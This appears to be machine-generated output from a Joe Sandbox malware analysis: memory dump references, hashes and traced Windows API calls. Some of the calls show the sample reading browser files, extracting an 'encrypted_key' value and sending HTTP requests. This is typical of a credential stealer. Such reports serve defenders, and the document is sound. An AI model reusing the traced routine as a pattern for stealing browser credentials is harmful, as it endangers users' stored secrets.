                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 9d13502aadeb4bfa6c908d0a910fe76eb6c8eb896f43c06a87d234c6e53741ad
                                    • Instruction ID: 7a1c00b0b3834a244f2ee31e7a5653ac1d4d9812703953a5cfc0a4ec547c7fa1
                                    • Opcode Fuzzy Hash: 9d13502aadeb4bfa6c908d0a910fe76eb6c8eb896f43c06a87d234c6e53741ad
                                    • Instruction Fuzzy Hash: 8451DB30910109ABCF18FF64C996EED7779AF61340F904028F80A975A1EF706B49DBE2
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C673492
                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6734A9
                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6734EF
                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C67350E
                                    • __Init_thread_footer.LIBCMT ref: 6C673522
                                    • __aulldiv.LIBCMT ref: 6C673552
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C67357C
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C673592
                                      • Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
                                      • Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                    • API String ID: 3634367004-706389432
                                    • Opcode ID: 49453486a03f4ad9996ee341fe91d26b7e35a79b6d9d0863155eb3c06ad1349e
                                    • Instruction ID: 2488d7147dee6887a24afec908c832bb8de6957349e2c51b368252636db98b63
                                    • Opcode Fuzzy Hash: 49453486a03f4ad9996ee341fe91d26b7e35a79b6d9d0863155eb3c06ad1349e
                                    • Instruction Fuzzy Hash: D131C471B002059BEF10DFBAD888AAE77B6FB86305F104429E521D3650DB709905CF6D
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: free$moz_xmalloc
                                    • String ID:
                                    • API String ID: 3009372454-0
                                    • Opcode ID: ee0e33c04e8b25b9e08f3a646fadee3ec7561237bf7532796415c1129a56edb5
                                    • Instruction ID: 7bc274157699efeb10a18dd4c2741e8735febf43f56e1433a5a0004ee595cc30
                                    • Opcode Fuzzy Hash: ee0e33c04e8b25b9e08f3a646fadee3ec7561237bf7532796415c1129a56edb5
                                    • Instruction Fuzzy Hash: 4AB10671A001148FDB28CF3CD8E87BD77A5AF46328F180A29E416DBB86D775D8408F69
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: f9e13b1b09ff035d5982b9bfc235c4f807a715a69ca03e8c04718a382f056645
                                    • Instruction ID: 9bf7d9033f9d3d496e860ee0dfa101690af1d63d3034b383394b5daf77d73ddd
                                    • Opcode Fuzzy Hash: f9e13b1b09ff035d5982b9bfc235c4f807a715a69ca03e8c04718a382f056645
                                    • Instruction Fuzzy Hash: 82C1A4B5900119ABCF18EF60DC99FDA7378BF64304F404598F40AA7241EB70AA85CFE1
                                    APIs
                                      • Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB
                                    • lstrcat.KERNEL32(?,00000000), ref: 00193DFC
                                    • lstrcat.KERNEL32(?,013ADF40), ref: 00193E1B
                                    • lstrcat.KERNEL32(?,?), ref: 00193E2F
                                    • lstrcat.KERNEL32(?,013ACD50), ref: 00193E43
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 00198830: GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A554C,?,?,001A0E07), ref: 0019883F
                                      • Part of subcall function 00189D30: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00189D89
                                      • Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
                                      • Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
                                      • Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
                                      • Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
                                      • Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
                                      • Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA
                                      • Part of subcall function 00198E60: GlobalAlloc.KERNEL32(00000000,00193EED,00193EED), ref: 00198E73
                                    • StrStrA.SHLWAPI(?,013ADFA0), ref: 00193F03
                                    • GlobalFree.KERNEL32(?), ref: 00193FFF
                                      • Part of subcall function 00189B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B3F
                                      • Part of subcall function 00189B10: LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 00189B51
                                      • Part of subcall function 00189B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B7A
                                      • Part of subcall function 00189B10: LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 00189B8F
                                      • Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00193F90
                                    • StrCmpCA.SHLWAPI(?,001A089B,?,?,?,?,000003E8), ref: 00193FAD
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00193FBF
                                    • lstrcat.KERNEL32(00000000,?), ref: 00193FD2
                                    • lstrcat.KERNEL32(00000000,001A0F88), ref: 00193FE1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$Local$AllocFile$Free$BinaryCryptGlobalString$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 1899081627-0
                                    • Opcode ID: a4582ff8f53a92f63aa5da5f80fb7559f26c587a255e532d94ace1b10fd6a67f
                                    • Instruction ID: 3a1853a8d831c5356dbb769d61d932bfaef987866b83d06e595fdd074d38a74d
                                    • Opcode Fuzzy Hash: a4582ff8f53a92f63aa5da5f80fb7559f26c587a255e532d94ace1b10fd6a67f
                                    • Instruction Fuzzy Hash: 277153B6910108ABCF14EBA0DC85FDE777DAF59300F448598F606A7181EB749B48CFA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                    • String ID:
                                    • API String ID: 1192971331-0
                                    • Opcode ID: 41c5850d8f2574063059fe1e5f38e86e03542bb051ddb164fde8f63fd6760835
                                    • Instruction ID: 3c709cdbf6361cd8845c36f5ed1707d72f6f6702420c1dadd25b0ff864ad800a
                                    • Opcode Fuzzy Hash: 41c5850d8f2574063059fe1e5f38e86e03542bb051ddb164fde8f63fd6760835
                                    • Instruction Fuzzy Hash: 5E3170B1A087048FDB00AF7DD68826EBBF1FF85345F01492DE99587211EB709449CB86
                                    APIs
                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C8273), ref: 6C6C9D65
                                    • free.MOZGLUE(6C6C8273,?), ref: 6C6C9D7C
                                    • free.MOZGLUE(?,?), ref: 6C6C9D92
                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6C9E0F
                                    • free.MOZGLUE(6C6C946B,?,?), ref: 6C6C9E24
                                    • free.MOZGLUE(?,?,?), ref: 6C6C9E3A
                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6C9EC8
                                    • free.MOZGLUE(6C6C946B,?,?,?), ref: 6C6C9EDF
                                    • free.MOZGLUE(?,?,?,?), ref: 6C6C9EF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                    • String ID:
                                    • API String ID: 956590011-0
                                    • Opcode ID: f4e41864c82b365101f029fc4d2347b1aeab8f286d35d697837c1767e57dc9bc
                                    • Instruction ID: 47cf202e046f2f6c6fcad783ce58ac714319064c696f4f7c110708e00fd83af6
                                    • Opcode Fuzzy Hash: f4e41864c82b365101f029fc4d2347b1aeab8f286d35d697837c1767e57dc9bc
                                    • Instruction Fuzzy Hash: 30719F70A09B418BC712CF18C48055BF3F4FF9A319B449619E85A9B711EB31F886CB8A
                                    APIs
                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C6CDDCF
                                      • Part of subcall function 6C6AFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AFA4B
                                      • Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C90FF
                                      • Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C9108
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDE0D
                                    • free.MOZGLUE(00000000), ref: 6C6CDE41
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDE5F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDEA3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDEE9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C6BDEFD,?,6C684A68), ref: 6C6CDF32
                                      • Part of subcall function 6C6CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6CDB86
                                      • Part of subcall function 6C6CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6CDC0E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C6BDEFD,?,6C684A68), ref: 6C6CDF65
                                    • free.MOZGLUE(?), ref: 6C6CDF80
                                      • Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
                                      • Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
                                      • Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                    • String ID:
                                    • API String ID: 112305417-0
                                    • Opcode ID: b2bca46aaa2b23a520223159d0eab3545a445d8044d05873497b6b606a07ab8c
                                    • Instruction ID: 6d0ccacd52e07a4dfdd48f7563f83b0d9ea49fb65ef158e1f03cd052458afeaf
                                    • Opcode Fuzzy Hash: b2bca46aaa2b23a520223159d0eab3545a445d8044d05873497b6b606a07ab8c
                                    • Instruction Fuzzy Hash: AC51A3727416019BD7219A29D8806EEB3B2FF96308F95011CD86A53B00DB31F91BCB9F
                                    APIs
                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D32
                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D62
                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D6D
                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D84
                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5DA4
                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5DC9
                                    • std::_Facet_Register.LIBCPMT ref: 6C6D5DDB
                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5E00
                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5E45
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                    • String ID:
                                    • API String ID: 2325513730-0
                                    • Opcode ID: aa4c68f561c3f345c4603a7b5151f331bbc1252b6b70978e62e0e94465c03b55
                                    • Instruction ID: b1ec9c848d94b7f71cba08e5d97ebe55e57868396172c5d450dd8ae9fa7b264e
                                    • Opcode Fuzzy Hash: aa4c68f561c3f345c4603a7b5151f331bbc1252b6b70978e62e0e94465c03b55
                                    • Instruction Fuzzy Hash: F8416E707002059FDB00EFA5D8D8AAE77F6FF89314F154069E51697B91EB30E805CB69
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6731A7), ref: 6C6ACDDD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                    • API String ID: 4275171209-2186867486
                                    • Opcode ID: 52cf3b538e976a3327598f18226b1dbb035ea27016c4e4c7ecf1db3d4f8e3a48
                                    • Instruction ID: 9326e5b7ec01dba63c978be58e60674a9015e7defc28909d10e4058bf435295e
                                    • Opcode Fuzzy Hash: 52cf3b538e976a3327598f18226b1dbb035ea27016c4e4c7ecf1db3d4f8e3a48
                                    • Instruction Fuzzy Hash: A031C8707412056BFB00AFE98D45BAE7BB6BF85754F204014F522ABA80DB71D903CB9D
                                    APIs
                                      • Part of subcall function 6C67F100: LoadLibraryW.KERNEL32(shell32,?,6C6ED020), ref: 6C67F122
                                      • Part of subcall function 6C67F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C67F132
                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C67ED50
                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C67EDAC
                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C67EDCC
                                    • CreateFileW.KERNEL32 ref: 6C67EE08
                                    • free.MOZGLUE(00000000), ref: 6C67EE27
                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C67EE32
                                      • Part of subcall function 6C67EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C67EBB5
                                      • Part of subcall function 6C67EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C6AD7F3), ref: 6C67EBC3
                                      • Part of subcall function 6C67EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C6AD7F3), ref: 6C67EBD6
                                    Strings
                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C67EDC1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                    • API String ID: 1980384892-344433685
                                    • Opcode ID: a1ece13c5dca2bad18ae7aeb64fa7c3016d1d66db6ccc7da674fac9c8d5d91ed
                                    • Instruction ID: 15c1150a4c6cf0a0477dac7b9c1eea9649bd7e9959e89c9914e12cce9c7e8515
                                    • Opcode Fuzzy Hash: a1ece13c5dca2bad18ae7aeb64fa7c3016d1d66db6ccc7da674fac9c8d5d91ed
                                    • Instruction Fuzzy Hash: 1851C071D052049FDB20DF68D9806EEB7B1AF5A318F048D2DE8556B740E730694DC7BA
                                    APIs
                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6EA565
                                      • Part of subcall function 6C6EA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EA4BE
                                      • Part of subcall function 6C6EA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6EA4D6
                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6EA65B
